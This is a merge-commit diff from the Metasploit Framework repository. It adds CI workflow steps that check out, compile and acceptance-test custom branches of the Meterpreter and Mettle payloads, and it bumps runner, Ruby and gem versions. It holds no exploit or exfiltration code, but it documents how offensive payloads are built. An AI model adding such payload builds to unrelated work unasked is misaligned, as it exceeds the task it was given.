Land #19390 , Adds support to test custom payload branches

automatic module_metadata_base.json update
Adds support to test custom payload branches
2024-08-21 17:06:21 +01:00 · 2024-08-21 09:03:13 -05:00 · 2024-08-21 15:02:19 +01:00 · 2024-08-21 09:44:15 -04:00 · 2024-08-21 08:15:03 -05:00 · 2024-08-21 13:58:26 +01:00
504 changed files with 28642 additions and 3155 deletions
@@ -2,4 +2,7 @@ blank_issues_enabled: false
 contact_links:
  - name: Termux Issues?
    url: https://github.com/rapid7/metasploit-framework/issues/11023
-    about: Termux is not officially supported, check here for more info
+    about: Termux is not officially supported, check here for more info
+  - name: Android Payload Issues?
+    url: https://github.com/rapid7/metasploit-framework/issues/19154
+    about: Check here for more info
@@ -22,6 +22,16 @@ permissions:
  statuses: none

 on:
+  workflow_dispatch:
+    inputs:
+      metasploitPayloadsCommit:
+        description: 'metasploit-payloads branch would like to test'
+        required: true
+        default: 'master'
+      mettleCommit:
+        description: 'mettle branch you would like to test'
+        required: true
+        default: 'master'
  push:
    branches-ignore:
      - gh-pages
@@ -52,7 +62,7 @@ jobs:
      fail-fast: false
      matrix:
        os:
-          - macos-11
+          - macos-12
          - windows-2019
          - ubuntu-20.04
        ruby:
@@ -62,31 +72,35 @@ jobs:
          - { name: python, runtime_version: 3.6 }
          - { name: python, runtime_version: 3.11 }

-          # Java - newer versions of Java are not supported currently: https://github.com/rapid7/metasploit-payloads/issues/647
+          # Java
          - { name: java, runtime_version: 8 }
+          - { name: java, runtime_version: 21 }

-          # PHP - Temporarily removed as tests are timing out on Github actions
-          # - { name: php, runtime_version: 5.3 }
-          # - { name: php, runtime_version: 7.4 }
-          # - { name: php, runtime_version: 8.2 }
+          # PHP
+          - { name: php, runtime_version: 5.3 }
+          - { name: php, runtime_version: 7.4 }
+          - { name: php, runtime_version: 8.3 }
        include:
          # Windows Meterpreter
          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }

          # Mettle
-          - { meterpreter: { name: mettle }, os: macos-11 }
+          - { meterpreter: { name: mettle }, os: macos-12 }
          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }

    runs-on: ${{ matrix.os }}

-    timeout-minutes: 25
+    timeout-minutes: 50

    env:
      RAILS_ENV: test
+      metasploitPayloadsCommit: ${{ github.event.inputs.metasploitPayloadsCommit || 'master' }}
+      mettleCommit: ${{ github.event.inputs.mettleCommit|| 'master' }}
      HOST_RUNNER_IMAGE: ${{ matrix.os }}
      METERPRETER: ${{ matrix.meterpreter.name }}
      METERPRETER_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
+      BUNDLE_WITHOUT: "coverage development"

    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
    steps:
@@ -94,7 +108,7 @@ jobs:
        if: runner.os == 'Linux'
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

-      - uses: shivammathur/setup-php@6d7209f44a25a59e904b1ee9f3b0c33ab2cd888d
+      - uses: shivammathur/setup-php@fc14643b0a99ee9db10a3c025a33d76544fa3761
        if: ${{ matrix.meterpreter.name == 'php' }}
        with:
          php-version: ${{ matrix.meterpreter.runtime_version }}
@@ -127,23 +141,127 @@ jobs:
          dir %WINDIR%
          type %WINDIR%\\system32\\drivers\\etc\\hosts

-      - name: Checkout code
+      # The job checkout structure is:
+      #  .
+      #  ├── metasploit-framework
+      #  └── metasploit-payloads (Only if the "payload-testing-branch" GitHub label is applied)
+      #  └── mettle (Only if the "payload-testing-mettle-branch" GitHub label is applied)
+
+      - name: Install Docker - macOS
+        if: ${{ ( matrix.meterpreter.name == 'java') && (runner.os == 'macos' ) && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
+        run: |
+          brew install docker
+          colima delete
+          colima start --arch x86_64
+
+      - name: Checkout mettle
+        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
        uses: actions/checkout@v4
+        with:
+          repository: rapid7/mettle
+          path: mettle
+          ref: ${{ env.mettleCommit }}
+
+      - name: Get mettle version
+        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
+        run: |
+          echo "METTLE_VERSION=$(grep -oh '[0-9].[0-9].[0-9]*' lib/metasploit_payloads/mettle/version.rb)" | tee -a $GITHUB_ENV
+        working-directory: mettle
+
+      - name: Prerequisite mettle gem setup
+        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
+        run: |
+          set -x
+          ruby -pi.bak -e "gsub(/${{ env.METTLE_VERSION }}/, '${{ env.METTLE_VERSION }}-dev')" lib/metasploit_payloads/mettle/version.rb
+        working-directory: mettle
+
+      - name: Compile mettle payloads
+        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os != 'macos' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
+        run: |
+          docker run --rm=true --tty --volume=$(pwd):/mettle --workdir=/mettle rapid7/build:mettle rake mettle:build mettle:check
+          rake build
+        working-directory: mettle
+
+      - name: Compile mettle payloads - macOS
+        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os == 'macos' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
+        run: |
+          make TARGET=x86_64-apple-darwin
+          rake build
+        working-directory: mettle
+
+      - name: Checkout metasploit-framework code
+        uses: actions/checkout@v4
+        with:
+          path: metasploit-framework

      - name: Setup Ruby
        env:
-          BUNDLE_WITHOUT: "coverage development"
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
          ruby-version: ${{ matrix.ruby }}
          bundler-cache: true
          cache-version: 4
+          working-directory: metasploit-framework
          # Github actions with Ruby requires Bundler 2.2.18+
          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
          bundler: 2.2.33

-      - name: acceptance
+      - name: Move mettle gem into framework
+        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'mettle-testing-branch')) }}
+        run: |
+          cp ./mettle/pkg/metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem ./metasploit-framework
+        working-directory: metasploit-framework
+
+      - name: Install mettle gem
+        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
+        run: |
+          set -x
+          bundle exec gem install metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem
+          ruby -pi.bak -e "gsub(/'metasploit_payloads-mettle', '${{ env.METTLE_VERSION }}'/, '\'metasploit_payloads-mettle\', \'${{ env.METTLE_VERSION }}.pre.dev\'')" metasploit-framework.gemspec
+          bundle config unset deployment
+          bundle update metasploit_payloads-mettle
+          bundle install
+        working-directory: metasploit-framework
+
+      - name: Checkout metasploit-payloads
+        if: contains(github.event.issue.labels.*.name, 'payload-testing-branch')
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-payloads
+          path: metasploit-payloads
+          ref: ${{ env.metasploitPayloadsCommit }}
+
+      - name: Build Java and Android payloads
+        if: ${{ (matrix.meterpreter.name == 'java') && (runner.os != 'Windows') && (contains(github.event.issue.labels.*.name, 'payload-testing-branch')) }}
+        run: |
+          docker run --rm -w "$(pwd)" -v "$(pwd):$(pwd)" rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "cd metasploit-payloads/java && make clean && make android && mvn -P deploy package"
+
+      - name: Build Windows payloads via Visual Studio 2019 Build (Windows)
+        shell: cmd
+        if: ${{ (runner.os == 'Windows') && (matrix.os == 'windows-2019') && (contains(github.event.issue.labels.*.name, 'payload-testing-branch')) }}
+        run: |
+          cd c/meterpreter
+          git submodule init && git submodule update
+          "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat
+        working-directory: metasploit-payloads
+
+      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
+        shell: cmd
+        if: ${{ (runner.os == 'Windows') && (matrix.os == 'windows-2022') && (contains(github.event.issue.labels.*.name, 'payload-testing-branch'))}}
+        run: |
+          cd c/meterpreter
+          git submodule init && git submodule update
+          make.bat
+        working-directory: metasploit-payloads
+
+      - name: Build PHP, Python and Windows payloads
+        if: ${{ ((matrix.meterpreter.name == 'php') || (matrix.meterpreter.name == 'python') || (runner.os == 'Windows')) && (contains(github.event.issue.labels.*.name, 'payload-testing-branch'))}}
+        run: |
+          make install-php install-python install-windows
+        working-directory: metasploit-payloads
+
+      - name: Acceptance
        env:
          SPEC_HELPER_LOAD_METASPLOIT: false
          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
@@ -156,6 +274,7 @@ jobs:
        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
        run: |
          bundle exec rspec spec/acceptance/meterpreter_spec.rb
+        working-directory: metasploit-framework

      - name: Archive results
        if: always()
@@ -163,7 +282,7 @@ jobs:
        with:
          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
-          path: tmp/allure-raw-data
+          path: metasploit-framework/tmp/allure-raw-data

  # Generate a final report from the previous test results
  report:
@@ -184,7 +303,6 @@ jobs:
      - name: Setup Ruby
        if: always()
        env:
-          BUNDLE_WITHOUT: "coverage development"
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
@@ -195,7 +195,7 @@ jobs:
                  close: true,
                  comment: `
                    Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.
-            
+
                    We've labeled this as \`attic\` and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.
                  `
                }
@@ -36,6 +36,7 @@ on:
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
 #   Example of running as a cron, to weed out flaky tests
 #  schedule:
 #    - cron: '*/15 * * * *'
@@ -55,6 +56,7 @@ jobs:

    env:
      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"

    name: LDAP Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
    steps:
@@ -72,7 +74,6 @@ jobs:

      - name: Setup Ruby
        env:
-          BUNDLE_WITHOUT: "coverage development pcap"
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
        uses: ruby/setup-ruby@v1
@@ -123,7 +124,6 @@ jobs:
      - name: Setup Ruby
        if: always()
        env:
-          BUNDLE_WITHOUT: "coverage development"
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
@@ -31,11 +31,14 @@ jobs:
    runs-on: ubuntu-latest
    timeout-minutes: 40

+    env:
+      BUNDLE_WITHOUT: "coverage development pcap"
+
    strategy:
      fail-fast: true
      matrix:
        ruby:
-          - '3.0'
+          - '3.1'

    name: Lint msftidy
    steps:
@@ -53,8 +56,6 @@ jobs:
        with:
          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
-        env:
-          BUNDLE_WITHOUT: "coverage development pcap"

      - name: Run msftidy
        run: |
@@ -36,6 +36,7 @@ on:
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
 #   Example of running as a cron, to weed out flaky tests
 #  schedule:
 #    - cron: '*/15 * * * *'
@@ -71,6 +72,8 @@ jobs:

    env:
      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
+

    name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
    steps:
@@ -82,7 +85,6 @@ jobs:

      - name: Setup Ruby
        env:
-          BUNDLE_WITHOUT: "coverage development pcap"
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
        uses: ruby/setup-ruby@v1
@@ -141,7 +143,6 @@ jobs:
      - name: Setup Ruby
        if: always()
        env:
-          BUNDLE_WITHOUT: "coverage development"
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
@@ -36,6 +36,7 @@ on:
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
 #   Example of running as a cron, to weed out flaky tests
 #  schedule:
 #    - cron: '*/15 * * * *'
@@ -65,12 +66,11 @@ jobs:
          - ubuntu-latest
        target:
          - { version: "mariadb:latest", health_cmd: "mariadb -uroot -ppassword -e 'SELECT version()'" }
-          - { version: "mariadb:5.5.42", health_cmd: "mysql -uroot -ppassword -e 'SELECT version()'" }
          - { version: "mysql:latest", health_cmd: "mysql -uroot -ppassword -e 'SELECT version()'" }
-          - { version: "mysql:5.5.42", health_cmd: "mysql -uroot -ppassword -e 'SELECT version()'" }

    env:
      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"

    name: ${{ matrix.target.version }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
    steps:
@@ -82,7 +82,6 @@ jobs:

      - name: Setup Ruby
        env:
-          BUNDLE_WITHOUT: "coverage development pcap"
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
        uses: ruby/setup-ruby@v1
@@ -141,7 +140,6 @@ jobs:
      - name: Setup Ruby
        if: always()
        env:
-          BUNDLE_WITHOUT: "coverage development"
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
@@ -36,6 +36,7 @@ on:
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
 #   Example of running as a cron, to weed out flaky tests
 #  schedule:
 #    - cron: '*/15 * * * *'
@@ -71,6 +72,7 @@ jobs:

    env:
      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"

    name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
    steps:
@@ -82,7 +84,6 @@ jobs:

      - name: Setup Ruby
        env:
-          BUNDLE_WITHOUT: "coverage development pcap"
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
        uses: ruby/setup-ruby@v1
@@ -141,7 +142,6 @@ jobs:
      - name: Setup Ruby
        if: always()
        env:
-          BUNDLE_WITHOUT: "coverage development"
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
@@ -36,6 +36,7 @@ on:
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
 #   Example of running as a cron, to weed out flaky tests
 #  schedule:
 #    - cron: '*/15 * * * *'
@@ -57,6 +58,7 @@ jobs:
      RAILS_ENV: test
      SMB_USERNAME: acceptance_tests_user
      SMB_PASSWORD: acceptance_tests_password
+      BUNDLE_WITHOUT: "coverage development pcap"

    name: SMB Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
    steps:
@@ -74,7 +76,6 @@ jobs:

      - name: Setup Ruby
        env:
-          BUNDLE_WITHOUT: "coverage development pcap"
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
        uses: ruby/setup-ruby@v1
@@ -125,7 +126,6 @@ jobs:
      - name: Setup Ruby
        if: always()
        env:
-          BUNDLE_WITHOUT: "coverage development"
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
@@ -64,10 +64,10 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.0'
          - '3.1'
          - '3.2'
-          - '3.3.0-preview3'
+          - '3.3'
+          - '3.4.0-preview1'
        os:
          - ubuntu-20.04
          - ubuntu-latest
@@ -86,6 +86,7 @@ jobs:

    env:
      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"

    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
    steps:
@@ -97,7 +98,6 @@ jobs:

      - name: Setup Ruby
        env:
-          BUNDLE_WITHOUT: "coverage development pcap"
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
        uses: ruby/setup-ruby@v1
@@ -1,4 +1,5 @@
 adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
+adeherdt-r7 <adeherdt-r7@github>       Arne De Herdt <arne_deherdt@rapid7.com>
 bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
 cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
 cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
@@ -15,6 +16,7 @@ space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
 todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>               <todb@metasploit.com>
 todb-r7 <todb-r7@github>               <todb@packetfu.com>
+dledda-r7 <dledda-r7@github>           <diego_ledda@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -9,7 +9,7 @@
 # inherit_from: .rubocop_todo.yml

 AllCops:
-  TargetRubyVersion: 2.6
+  TargetRubyVersion: 2.7
  SuggestExtensions: false
  NewCops: disable

@@ -1 +1 @@
-3.0.5
+3.1.5
@@ -1,4 +1,4 @@
-FROM ruby:3.1.4-alpine3.18 AS builder
+FROM ruby:3.1.5-alpine3.18 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -53,7 +53,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.1.4-alpine3.18
+FROM ruby:3.1.5-alpine3.18
 LABEL maintainer="Rapid7"
 ARG TARGETARCH

@@ -1,7 +1,9 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.7)
+    metasploit-framework (6.4.23)
+      aarch64
+      abbrev
      actionpack (~> 7.0.0)
      activerecord (~> 7.0.0)
      activesupport (~> 7.0.0)
@@ -10,12 +12,16 @@ PATH
      aws-sdk-iam
      aws-sdk-s3
      aws-sdk-ssm
+      base64
      bcrypt
      bcrypt_pbkdf
+      bigdecimal
      bootsnap
      bson
      chunky_png
+      csv
      dnsruby
+      drb
      ed25519
      em-http-request
      eventmachine
@@ -23,7 +29,9 @@ PATH
      faraday (= 2.7.11)
      faraday-retry
      faye-websocket
+      ffi (< 1.17.0)
      filesize
+      getoptlong
      hrr_rb_ssh-ed25519
      http-cookie
      irb (~> 1.7.4)
@@ -35,17 +43,19 @@ PATH
      metasploit-model
      metasploit-payloads (= 2.0.166)
      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.26)
+      metasploit_payloads-mettle (= 1.0.31)
      mqtt
      msgpack (~> 1.6.0)
+      mutex_m
      nessus_rest
      net-imap
      net-ldap
+      net-sftp
      net-smtp
      net-ssh
      network_interface
      nexpose
-      nokogiri (~> 1.14.0)
+      nokogiri
      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
@@ -85,7 +95,7 @@ PATH
      rubyntlm
      rubyzip
      sinatra
-      sqlite3 (= 1.6.6)
+      sqlite3 (= 1.7.3)
      sshkey
      swagger-blocks
      thin
@@ -103,26 +113,29 @@ PATH
 GEM
  remote: https://rubygems.org/
  specs:
-    Ascii85 (1.1.0)
-    actionpack (7.0.8.1)
-      actionview (= 7.0.8.1)
-      activesupport (= 7.0.8.1)
+    Ascii85 (1.1.1)
+    aarch64 (2.1.0)
+      racc (~> 1.6)
+    abbrev (0.1.2)
+    actionpack (7.0.8.4)
+      actionview (= 7.0.8.4)
+      activesupport (= 7.0.8.4)
      rack (~> 2.0, >= 2.2.4)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.8.1)
-      activesupport (= 7.0.8.1)
+    actionview (7.0.8.4)
+      activesupport (= 7.0.8.4)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.8.1)
-      activesupport (= 7.0.8.1)
-    activerecord (7.0.8.1)
-      activemodel (= 7.0.8.1)
-      activesupport (= 7.0.8.1)
-    activesupport (7.0.8.1)
+    activemodel (7.0.8.4)
+      activesupport (= 7.0.8.4)
+    activerecord (7.0.8.4)
+      activemodel (= 7.0.8.4)
+      activesupport (= 7.0.8.4)
+    activesupport (7.0.8.4)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
@@ -130,10 +143,10 @@ GEM
    addressable (2.8.6)
      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
-    allure-rspec (2.24.3)
-      allure-ruby-commons (= 2.24.3)
+    allure-rspec (2.24.5)
+      allure-ruby-commons (= 2.24.5)
      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.24.3)
+    allure-ruby-commons (2.24.5)
      mime-types (>= 3.3, < 4)
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
@@ -142,37 +155,37 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.3.0)
-    aws-partitions (1.915.0)
-    aws-sdk-core (3.192.0)
+    aws-partitions (1.941.0)
+    aws-sdk-core (3.197.0)
      aws-eventstream (~> 1, >= 1.3.0)
      aws-partitions (~> 1, >= 1.651.0)
      aws-sigv4 (~> 1.8)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.450.0)
-      aws-sdk-core (~> 3, >= 3.191.0)
+    aws-sdk-ec2 (1.460.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-ec2instanceconnect (1.38.0)
-      aws-sdk-core (~> 3, >= 3.191.0)
+    aws-sdk-ec2instanceconnect (1.41.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.96.0)
-      aws-sdk-core (~> 3, >= 3.191.0)
+    aws-sdk-iam (1.99.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.79.0)
-      aws-sdk-core (~> 3, >= 3.191.0)
+    aws-sdk-kms (1.83.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.147.0)
-      aws-sdk-core (~> 3, >= 3.192.0)
+    aws-sdk-s3 (1.152.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.8)
-    aws-sdk-ssm (1.166.0)
-      aws-sdk-core (~> 3, >= 3.191.0)
+    aws-sdk-ssm (1.170.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
      aws-sigv4 (~> 1.1)
    aws-sigv4 (1.8.0)
      aws-eventstream (~> 1, >= 1.0.2)
    base64 (0.2.0)
    bcrypt (3.1.20)
-    bcrypt_pbkdf (1.1.0)
-    bigdecimal (3.1.7)
+    bcrypt_pbkdf (1.1.1)
+    bigdecimal (3.1.8)
    bindata (2.4.15)
    bootsnap (1.18.3)
      msgpack (~> 1.2)
@@ -181,9 +194,10 @@ GEM
    byebug (11.1.3)
    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.2.3)
+    concurrent-ruby (1.3.1)
    cookiejar (0.3.4)
    crass (1.0.6)
+    csv (3.3.0)
    daemons (1.4.1)
    date (3.3.4)
    debug (1.8.0)
@@ -194,6 +208,7 @@ GEM
      simpleidn (~> 0.2.1)
    docile (1.4.0)
    domain_name (0.6.20240107)
+    drb (2.2.1)
    ed25519 (1.3.0)
    em-http-request (1.1.7)
      addressable (>= 2.3.4)
@@ -210,7 +225,7 @@ GEM
    factory_bot_rails (6.4.3)
      factory_bot (~> 6.4)
      railties (>= 5.0.0)
-    faker (3.3.1)
+    faker (3.4.1)
      i18n (>= 1.8.11, < 2)
    faraday (2.7.11)
      base64
@@ -225,6 +240,7 @@ GEM
    ffi (1.16.3)
    filesize (0.2.0)
    fivemat (1.3.7)
+    getoptlong (0.2.1)
    gssapi (1.3.1)
      ffi (>= 1.0.1)
    gyoku (1.4.0)
@@ -235,11 +251,11 @@ GEM
    hrr_rb_ssh-ed25519 (0.4.2)
      ed25519 (~> 1.2)
      hrr_rb_ssh (>= 0.4)
-    http-cookie (1.0.5)
+    http-cookie (1.0.6)
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
    httpclient (2.8.3)
-    i18n (1.14.4)
+    i18n (1.14.5)
      concurrent-ruby (~> 1.0)
    io-console (0.7.2)
    irb (1.7.4)
@@ -250,7 +266,7 @@ GEM
    json (2.7.2)
    language_server-protocol (3.17.0.3)
    little-plugger (1.1.4)
-    logging (2.3.1)
+    logging (2.4.0)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
    loofah (2.22.0)
@@ -290,33 +306,36 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.26)
+    metasploit_payloads-mettle (1.0.31)
    method_source (1.1.0)
    mime-types (3.5.2)
      mime-types-data (~> 3.2015)
-    mime-types-data (3.2024.0305)
-    mini_portile2 (2.8.6)
-    minitest (5.22.3)
+    mime-types-data (3.2024.0604)
+    mini_portile2 (2.8.7)
+    minitest (5.23.1)
    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
+    mutex_m (0.2.0)
    nessus_rest (0.1.6)
-    net-imap (0.4.10)
+    net-imap (0.4.12)
      date
      net-protocol
    net-ldap (0.19.0)
    net-protocol (0.2.2)
      timeout
+    net-sftp (4.0.0)
+      net-ssh (>= 5.0.0, < 8.0.0)
    net-smtp (0.5.0)
      net-protocol
    net-ssh (7.2.3)
    network_interface (0.0.4)
    nexpose (7.3.0)
-    nio4r (2.7.1)
-    nokogiri (1.14.5)
-      mini_portile2 (~> 2.8.0)
+    nio4r (2.7.3)
+    nokogiri (1.16.5)
+      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
    nori (2.7.0)
      bigdecimal
@@ -329,11 +348,11 @@ GEM
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
    parallel (1.24.0)
-    parser (3.3.0.5)
+    parser (3.3.2.0)
      ast (~> 2.4.1)
      racc
    patch_finder (1.0.2)
-    pcaprub (0.13.2)
+    pcaprub (0.13.3)
    pdf-reader (2.12.0)
      Ascii85 (~> 1.0)
      afm (~> 0.2.1)
@@ -350,7 +369,7 @@ GEM
    public_suffix (5.0.5)
    puma (6.4.2)
      nio4r (~> 2.0)
-    racc (1.7.3)
+    racc (1.8.0)
    rack (2.2.9)
    rack-protection (3.2.0)
      base64 (>= 0.1.0)
@@ -364,9 +383,9 @@ GEM
    rails-html-sanitizer (1.6.0)
      loofah (~> 2.21)
      nokogiri (~> 1.14)
-    railties (7.0.8.1)
-      actionpack (= 7.0.8.1)
-      activesupport (= 7.0.8.1)
+    railties (7.0.8.4)
+      actionpack (= 7.0.8.4)
+      activesupport (= 7.0.8.4)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
@@ -379,8 +398,8 @@ GEM
    recog (3.1.5)
      nokogiri
    redcarpet (3.6.0)
-    regexp_parser (2.9.0)
-    reline (0.5.2)
+    regexp_parser (2.9.2)
+    reline (0.5.8)
      io-console (~> 0.5)
    require_all (3.0.0)
    rex-arch (0.1.15)
@@ -391,7 +410,7 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.31)
+    rex-core (0.1.32)
    rex-encoder (0.1.7)
      metasm
      rex-arch
@@ -414,7 +433,7 @@ GEM
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.11)
+    rex-random_identifier (0.1.12)
      rex-text
    rex-registry (0.1.5)
    rex-rop_builder (0.1.5)
@@ -428,10 +447,11 @@ GEM
      rex-socket
      rex-text
    rex-struct2 (0.1.4)
-    rex-text (0.2.57)
+    rex-text (0.2.58)
    rex-zip (0.1.5)
      rex-text
-    rexml (3.2.6)
+    rexml (3.2.8)
+      strscan (>= 3.0.9)
    rkelly-remix (0.0.7)
    rspec (3.13.0)
      rspec-core (~> 3.13.0)
